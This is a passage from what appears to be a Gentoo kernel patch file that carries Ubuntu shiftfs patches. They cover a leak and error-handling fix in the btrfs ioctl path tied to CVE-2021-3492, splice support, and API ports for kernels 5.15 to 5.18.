+index 4f1d94903557..8eab93691d62 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
++	*b1 = NULL;
++	*b2 = NULL;
++
+ 	if (!is_btrfs_snap_ioctl(cmd))
+ 		return 0;
+ 
+@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		if (IS_ERR(v1))
+ 			return PTR_ERR(v1);
+ 		oldfd = v1->fd;
+-		*b1 = v1;
+ 	} else {
+ 		v2 = memdup_user(arg, sizeof(*v2));
+ 		if (IS_ERR(v2))
+ 			return PTR_ERR(v2);
+ 		oldfd = v2->fd;
+-		*b2 = v2;
+ 	}
+ 
+ 	src = fdget(oldfd);
+-	if (!src.file)
+-		return -EINVAL;
++	if (!src.file) {
++		ret = -EINVAL;
++		goto err_free;
++	}
+ 
+ 	ret = shiftfs_real_fdget(src.file, &lfd);
+ 	if (ret) {
+ 		fdput(src);
+-		return ret;
++		goto err_free;
+ 	}
+ 
+ 	/*
+@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+ 		fdput(lfd);
+-		return *newfd;
++		ret = *newfd;
++		goto err_free;
+ 	}
+ 
+ 	fd_install(*newfd, lfd.file);
+@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		v2->fd = oldfd;
+ 	}
+ 
+-	if (ret)
++	if (!ret) {
++		*b1 = v1;
++		*b2 = v2;
++	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++	}
++
++	return ret;
++
++err_free:
++	kfree(v1);
++	kfree(v2);
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:10:37 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
+ correctly
+Cc: mpagano@gentoo.org
+
+shiftfs expects copy_to_user() to return a negative error code on
+failure, when it actually returns the amount of uncopied data. Fix all
+code using copy_to_user() to handle the return values correctly.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8eab93691d62..abeb7db3b9be 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+-	return ret;
++	return ret ? -EFAULT: 0;
+ }
+ 
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		*b2 = v2;
+ 	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++		ret = -EFAULT;
+ 	}
+ 
+ 	return ret;
+-- 
+2.39.2
+
+From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Mon, 9 Aug 2021 17:15:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1939301
+
+Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
+caused a regression for us. It states:
+
+> default_file_splice_write is the last piece of generic code that uses
+> set_fs to make the uaccess routines operate on kernel pointers.  It
+> implements a "fallback loop" for splicing from files that do not actually
+> provide a proper splice_read method.  The usual file systems and other
+> high bandwidth instances all provide a ->splice_read, so this just removes
+> support for various device drivers and procfs/debugfs files.  If splice
+> support for any of those turns out to be important it can be added back
+> by switching them to the iter ops and using generic_file_splice_read.
+
+this means that currently all workloads making use of sendfile() on
+shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
+by providing explicit .splice_read() and .splice_write() methods which
+jus restores the status quo and we keep using a generic method provided
+by the vfs.
+
+Cc: Seth Forshee <sforshee@kernel.org>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index abeb7db3b9be..f5f6d8d8144e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.copy_file_range	= shiftfs_copy_file_range,
+ 	.remap_file_range	= shiftfs_remap_file_range,
++	.splice_read		= generic_file_splice_read,
++	.splice_write		= iter_file_splice_write,
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
+-- 
+2.39.2
+
+From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Thu, 20 Jan 2022 16:55:24 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
+Cc: mpagano@gentoo.org
+
+WARNING: after this change we may see some regressions if shiftfs is
+used with filesystem namespaces.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
+ 1 file changed, 64 insertions(+), 43 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f5f6d8d8144e..76c54bc12018 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct user_namespace *ns,
++			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(lowerd, name, value, size, flags);
++	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_getxattr(lowerd, name, value, size);
++	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 	return err;
+ }
+ 
+-static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++static int shiftfs_removexattr(struct user_namespace *ns,
++			       struct dentry *dentry, const char *name)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(lowerd, name);
++	err = vfs_removexattr(ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ }
+ 
+ static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct user_namespace *ns,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, const void *value, size_t size,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(dentry, name);
+-	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(ns, dentry, name);
++	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct user_namespace *ns,
++				 struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(inode, diri, mode);
++		inode_init_owner(ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 	return err;
+ }
+ 
+-static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++static int shiftfs_create(struct user_namespace *ns,
++			  struct inode *dir, struct dentry *dentry,
+ 			  umode_t mode,  bool excl)
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+-static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			 umode_t mode)
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+-static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++static int shiftfs_mknod(struct user_namespace *ns,
++			 struct inode *dir, struct dentry *dentry, umode_t mode,
+ 			 dev_t rdev)
+ {
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+-static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(loweri, lowerd);
++		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
+ 	else
+-		err = vfs_unlink(loweri, lowerd, NULL);
++		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
+ 	revert_creds(oldcred);
+ 
+ 	if (!err) {
+@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	return shiftfs_rm(dir, dentry, true);
+ }
+ 
+-static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++static int shiftfs_rename(struct user_namespace *ns,
++			  struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		      *trapd;
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
++	struct renamedata rd = {
++		.old_mnt_userns	= ns,
++		.old_dir	= loweri_dir_old,
++		.old_dentry	= lowerd_old,
++		.new_mnt_userns	= ns,
++		.new_dir	= loweri_dir_new,
++		.new_dentry	= lowerd_new,
++	};
+ 	int err = -EINVAL;
+ 	const struct cred *oldcred;
+ 
+@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		goto out_unlock;
+ 
+ 	oldcred = shiftfs_override_creds(old->d_sb);
+-	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
+-			 NULL, flags);
++	err = vfs_rename(&rd);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(loweri_dir_old, olddir);
+@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+-static int shiftfs_permission(struct inode *inode, int mask)
++static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(inode, mask);
++	err = generic_permission(ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(loweri, mask);
++	err = inode_permission(ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
+ 	return err;
+ }
+ 
+-static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++static int shiftfs_tmpfile(struct user_namespace *ns,
++			   struct inode *dir, struct dentry *dentry,
+ 			   umode_t mode)
+ {
+ 	int err;
+@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+-static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(dentry, attr);
++	err = setattr_prepare(ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, &newattr, NULL);
++	err = notify_change(ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	return err;
+ }
+ 
+-static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++static int shiftfs_getattr(struct user_namespace *ns,
++			   const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
+ 			break;
+ 		case ACL_GROUP:
+-			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
+ 			kgid = shift_kgid(from, to, kgid);
+-			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
+ 			break;
+ 		default:
+ 			break;
+@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 	}
+ }
+ 
+-static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
++static struct posix_acl *
++shiftfs_get_acl(struct inode *inode, int type, bool rcu)
+ {
+ 	struct inode *loweri = inode->i_private;
+ 	const struct cred *oldcred;
+@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ 	int size;
+ 	int err;
+ 
++	if (rcu)
++		return ERR_PTR(-ECHILD);
++
+ 	if (!IS_POSIXACL(loweri))
+ 		return NULL;
+ 
+@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
+ 
+ static int
+ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct user_namespace *ns,
+ 			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(inode))
++	if (!inode_owner_or_capable(ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(dentry, handler->name);
++		err = shiftfs_removexattr(ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 13 Apr 2022 15:26:22 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
+Cc: mpagano@gentoo.org
+
+With the porting of shiftfs from 5.15 to 5.17 some filesystem-related
+functions are now passing struct user_namespace as argument, however
+shiftfs logic is still relying on the fact that these functions need to
+use the main filesystem namespace.
+
+Make sure to always use init_user_ns to prevent breakage of system
+components that rely on shiftfs.
+
+Without this fix lxd was showing some issues, like failing to create any
+file inside a container when shiftfs was used (e.g., using zfs as
+storage pool).
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
+ 1 file changed, 24 insertions(+), 26 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 76c54bc12018..a21624c529f0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct user_namespace *ns,
+-			    struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
++	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(ns, lowerd, name);
++	err = vfs_removexattr(&init_user_ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(ns, dentry, name);
+-	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(&init_user_ns, dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct user_namespace *ns,
+-				 struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(ns, inode, diri, mode);
++		inode_init_owner(&init_user_ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+ static int shiftfs_mknod(struct user_namespace *ns,
+@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(ns, inode, mask);
++	err = generic_permission(&init_user_ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(ns, loweri, mask);
++	err = inode_permission(&init_user_ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(ns, dentry, attr);
++	err = setattr_prepare(&init_user_ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(ns, lowerd, &newattr, NULL);
++	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(ns, dentry, handler->name);
++		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 27 Apr 2022 18:20:41 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21624c529f0..a5338dc6290c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -21,6 +21,7 @@
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
+ #include <linux/fiemap.h>
++#include <linux/pagemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
